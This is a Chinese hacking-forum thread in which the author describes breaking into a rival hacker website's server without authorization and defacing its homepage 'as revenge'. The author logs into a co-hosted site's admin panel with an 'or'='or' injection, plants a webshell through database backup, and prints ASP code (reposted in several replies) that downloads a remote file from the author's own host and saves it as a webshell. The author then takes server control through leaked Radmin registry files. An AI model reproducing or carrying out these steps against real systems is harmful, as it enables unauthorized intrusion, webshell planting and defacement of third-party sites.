发新话题
打印

[原创]渗透冰兰黑客基地

[原创]渗透冰兰黑客基地

信息来源:邪恶八进制信息安全团队(www.eviloctal.com
文章作者:消失再消失 QQ:617595(www.hackerchina.cn
转载请注明作者
注:本人已经提交到C.R.S.T ,适合新人学习..

首先是有个朋友对我说有个冰兰黑客基地,转载别人的文章还不著名作者,之后还蒙骗别人说他们能入侵国外站点. 所以就想检测一下.
首先看了以下他的站点,主站和论坛.分别在不同的服务器.
主站是新云的,虽然爆出很多漏洞,但是毕竟人家也是玩黑的,所以不期望能从程序漏洞拿了..
论坛是php的.没仔细看,决定渗透了.
一:点兵
拿出旁注
地址:http://www.icehack.cn
IP:XX.X.XX.X(忘记了...)
挖靠,N多站点....
最后选择了一个公司的站点,有注射点,但是不显示错误,手工猜解是asc数据库 ...
拿出HDSI扫后台,扫到后台地址为http://www.XXXXX.com/Product/manage/Manage.asp
到这里的时候直接用'or'='or' 试了下. 进去了..
有数据库备份和恢复. 直接传jpg的木马(大马).传不上去,可能限制了大小.
之后换小马,红狼1K大的小马,传好后备份.成功.

二:士气
小马传好了,各位一定认为直接传大马 ,之后就是提权的事了吧.可惜好事多磨...
传好小马之后我直接传个大马上传,但是如图1




提示错误:很抱歉,由于您提交的内容中或访问的内容中含有系统不允许的关键词,本次操作无效,系统已记录您的IP及您提交的所有数据。请注意,不要提交任何违反国家规定的内容!本次拦截的相关信息为:98424b88afb8



我以为换个大马就可以了,之后换了N个,国内的,国外的都试了.我想可能是禁止提交了,但是我提交几个字都可以提交上去,到这里,我快放弃了。
但是忽然想到一哥们(烟,灭在雪里)的方法.具体如下:
提交代码
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.hackerchina.cn/1.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("1.asp"),2
set sGet = nothing
set sPOST = nothing
%>
利用服务器的XML和数据流组件,从我的blog的1.txt的内容下载到目标站点根目录并保存为1.asp.
我提交这段代码,保存为3.asp ,之后访问,显示空白.
之后访问1.asp.如图


,成功了..
三 出征
已经拿到了一个webshell,就剩下提权了,但是提权一般难度要比webshell还难.如何呢?
WEB服务器版本  Microsoft-IIS/6.0
Scripting.FileSystemObject √ 文件操作组件
wscript.shell × 命令行执行组件
ADOX.Catalog √ ACCESS建库组件
JRO.JetEngine √ ACCESS压缩组件
Scripting.Dictionary √ 数据流上传辅助组件
Adodb.connection √ 数据库连接组件
Adodb.Stream √ 数据流上传组件
SoftArtisans.FileUp × SA-FileUp 文件上传组件
LyfUpload.UploadFile × 刘云峰文件上传组件
Persits.Upload.1 √ ASPUpload 文件上传组件
JMail.SmtpMail √ JMail 邮件收发组件
CDONTS.NewMail × 虚拟SMTP发信组件
SmtpMail.SmtpMail.1 × SmtpMail发信组件
wscript.shell × 命令行执行组件被删除.
装了servU6.3 但是找不路径,没有权限访问.不可跨目录,
只有C:\Program Files C:\Documents and Settings可访问,装了麦咖啡,
(感谢伤心的鱼)一兄弟告诉我本地溢出,baidu了下 都是控件的,感觉麻烦..
继续找别的突破口,忽然看到有radmin 目录,哈哈,高兴,看来装了radmin.
扫描了下端口,竟然没开43958.算了,读取下注册表 读取不了.但是radmin的目录下有3个注册表文件,下载回来研究。
四 得胜
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\NtUsers]
"1"=hex:24,00,00,00,00,00,00,00,1f,00,00,00,01,05,00,00,00,00,00,05,15,00,00,\
00,99,c8,3d,4a,e9,e2,9b,3a,e1,64,8a,f8,f1,03,00,00,24,00,00,00,00,00,00,00,\
1f,00,00,00,01,05,00,00,00,00,00,05,15,00,00,00,99,c8,3d,4a,e9,e2,9b,3a,e1,\
64,8a,f8,ec,03,00,00,24,00,00,00,00,00,00,00,1f,00,00,00,01,05,00,00,00,00,\
00,05,15,00,00,00,99,c8,3d,4a,e9,e2,9b,3a,e1,64,8a,f8,f4,01,00,00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Port"=hex:fe,ff,00,00
"Timeout"=hex:0a,00,00,00
"EnableLogFile"=hex:01,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"DisableTrayIcon"=hex:00,00,00,00
"AutoAllow"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00
"EnableEventLog"=hex:01,00,00,00
"Parameter"=hex:b3,8f,17,d7,f9,4e,cb,96,11,26,42,bf,29,cd,a6,86
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\RAdmin]
[HKEY_CURRENT_USER\Software\RAdmin\v2.0]
[HKEY_CURRENT_USER\Software\RAdmin\v2.0\Parameters]
"showbw"=hex:01,00,00,00
"ViewType"=hex:00,00,00,00
"ConnectionMode"=hex:49,9c,00,00
"xsize"=hex:77,01,00,00
"ysize"=hex:47,01,00,00
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin]
[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01]
[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:35,e3,db,da,7c,ef,32,ad,2c,a5,b8,1a,4b,e2,b2,47,7b,1d,eb,05,4c,36,\
0e,65,8a,ff,ec,aa,7d,63,a1,47,50,db,f2,0a,c5,a7,1d,dd,08,6b,7f,02,90,2b,b8,\
6c,da,7a,96,cb,dc,c9,e2,1a,8c,4d,25,39,57,f8,ee,83
以上是注册表文件的内容,
提权的步骤 感谢 fhod 支持.
3个注册表在本地运行之后,然后本地打开radmin设置,发现端口为65534
但是密码是32位MD5,麻烦.怎么破呢..
用星号密码查看器查看为 reityewi
,连接.....................连接不上...郁闷了..
后来才知道星号密码查看器 看到的都是这个reityewi....
后来,baidu了下.找到一篇文章是直接破解radmin控制端.
地址:http://www.hackerchina.cn/index/blog/post/123.html
之后连接radmin....ok.连接上了..
五 收兵
直接找到iis.


中间还有个小插曲...
管理员登陆了3389.这里再次感谢fhod,(和管理员比速度)...
打开iis,找到冰兰的站点,之后传了大马上去.如图.


呵呵 之后修改了首页,但是并没有对数据进行删除,算是带点报复的友情检测



再次感谢 伤心的鱼 fhod 烟,灭在雪里提供技术支持.
谁用了我的名字...我还得在我名字后加1才行....

TOP

用一句话他会不会拦截?
eavl的
20字节够写什么?

TOP

不错啊  也是一种思路

<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.hackerchina.cn/1.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("1.asp"),2
set sGet = nothing
set sPOST = nothing
%>

你的1.txt的内容是什么啊
只做安静的观众

TOP

引用:
引用第4楼simpleboy于2007-09-12 11:00发表的 :
你的1.txt的内容是什么啊
.......
大马的内容。
--->  伱 能 領 導 潮 流.  我 可 領 導 全 賕!  <---

TOP

没有什么没有必要的 渗透黑客站点跟普通站点一样 学习的是思路而已 提权那里我扫到的端口是6000 (我用superscan只扫到50000 汗了。没想到设置那么远) 后来消失说不对。 郁闷 怪我没仔细。。
www.hack521.cn

TOP

http://www.wolfexp.net/forum/vie ... &extra=page%3D1


CRST 带图片的....
看着会舒服些... EST 我传不上图片来
谁用了我的名字...我还得在我名字后加1才行....

TOP

以后偶对付一流防火墙就用这方法。。RADMIN提权 。。

TOP

二个地方不错 值得学习,
一:突破防御系统
二:RADMIN提权

fhod [s:71]

TOP

只能说是旁注吧,旁注并不等于渗透,渗透比这要远远复杂得多……

两个亮点之一没有什么好说的,他拦截什么,就改什么好了,基本能过得去,例如:net改成net1等等
你那样下载其实就是肉鸡上传8种方法中的一种,只是把那个VBS脚本改成ASP来鸟,思路还是不错。
不过你说到不能上传改成图片的大马,实在不明白,大马几几十KB,正常图片上百KB的也有,所以你推测的大小问题应该是不可能的(在我看来是完全不可能的,保留自己意见)。那么是什么原因上传不上去,我猜想还是那个什么一流防火墙的问题,如果不信,你可以换成一样大小甚至更大点的文本,然后改成图片格式上传,肯定是可以的。
既然推测是防火墙的问题,我的方法(对付大小做了限制的情况)也就没有必要再说了。懒得打字了,下次遇到再说。

第二个亮点也不算什么亮点了,邪八讨论区早有讨论了。

至于有没有放在邪八的必要,我记得我曾经的一篇菜鸟文章发在邪八,被众所谓牛X的大牛一起批斗,导致我到现在都不敢再写些菜鸟的东西发邪八了。论坛是个共公交流的社区,你知道的,并不代表大家都知道。Over。
脚本安全小组:Www.Cnsst.Org MSN:cn557@hotmail.com  我们这帮兄弟,永远的兄弟——We are not the only ones,but we will try to be the best!——All In Script 脚本渗透自用利器开发中……

TOP

晕死~
貌似除了二楼
没人说这文章不怎么样把
10楼和11楼的看法偏激了把

可能是有人觉得简单了
但大家也只是说出自己的意见的把
没必要看的这么重把

反正都是自己的成果

LZ不要管其他人的看法拉
玩世不恭彼此 ⌒ ˇ互相鼓励信任 認眞體驗每⒈兲.!﹏演藝⒉.個亾啲莞鎂傳奇( [淇]儭滗.

TOP

是旁入。
radmin的hash欺骗,动画原作者是goldsun牛牛,在讨论区早就有了。

TOP

如有jmail的话~也可以用这个写数据进去的。。。。kEvin1986写的那个。
昨天是明天的前天今天是昨天的明天明天是昨天的后天    ╰o╯╰o╯

TOP

我也碰到过一些站点会限制某些马的特殊字符。LZ的办法还不错,当然其实也可以修改马的本身使其达到效果。
至于RADMIN提权实在是没什么新鲜的了,纯数字或者纯英文的密码在十位内是很好破的,一般不会超过五分钟。能在RADMIN目录下到注册表文件真是好运,平时往往我们是读不到注册表内容的,更别说省去破解而用替换导入法。所以其实使用率还不是很大,需要一定权限才可以...

当然LZ如果把它做成教程拿出去发布,就是一大亮点了,否则,这贴很快就会沉....
H.U.C For Ever

TOP

radmin提权的确实非本文亮点,有人公布过操作录像。
突破一流拦截也不是什么问题,关键字拦截而已。
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.hackerchina.cn/1.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("1.asp"),2
set sGet = nothing
set sPOST = nothing
%>
这段代码是从海洋那里截取的?这个思路还比较不错。
20字节够写什么?

TOP

突破一流信息监控系统以前看过N多文章,LZ可以去看下....
webblog:      http://hi.baidu.com/zei86/

TOP

如果写的更详细些就是个不错的文章了
消失懒..写的也仓促了些
当时拿下的时候.就让他随便写写而已..

TOP

提示: 作者被禁止或删除 内容自动屏蔽

TOP

那个站点,旁注另外一看,还有500多个站,这么多,晕

TOP

发新话题